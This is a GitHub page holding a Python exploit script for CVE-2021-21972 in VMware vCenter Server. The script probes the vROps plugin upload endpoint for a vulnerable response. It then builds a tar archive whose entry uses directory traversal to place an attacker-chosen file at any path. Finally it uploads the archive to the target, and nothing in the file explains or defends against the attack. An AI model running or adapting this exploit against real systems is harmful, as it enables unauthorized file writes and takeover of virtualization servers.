-
Notifications
You must be signed in to change notification settings - Fork 87
/
CVE-2021-21972.py
61 lines (49 loc) · 2.27 KB
/
CVE-2021-21972.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/usr/bin/python3
import argparse
import requests
import tarfile
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
def check(ip):
r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
if r.status_code == 405:
print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
return True
else:
print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
return False
def make_traversal_path(path, level=5, os="unix"):
if os == "win":
traversal = ".." + "\\"
fullpath = traversal*level + path
return fullpath.replace('/', '\\').replace('\\\\', '\\')
else:
traversal = ".." + "/"
fullpath = traversal*level + path
return fullpath.replace('\\', '/').replace('//', '/')
def archive(file, path, os):
tarf = tarfile.open('exploit.tar', 'w')
fullpath = make_traversal_path(path, level=5, os=os)
print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
tarf.add(file, fullpath)
tarf.close()
print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
def post(ip):
r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
if r.status_code == 200 and r.text == 'SUCCESS':
print('[+] File uploaded successfully')
else:
print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
parser.add_argument('-f', '--file', help='The file to tar')
parser.add_argument('-p', '--path', help='The path to extract the file to on target')
parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
args = parser.parse_args()
vulnerable = check(args.target)
if vulnerable and (args.file and args.path and args.operating_system):
archive(args.file, args.path, args.operating_system)
post(args.target)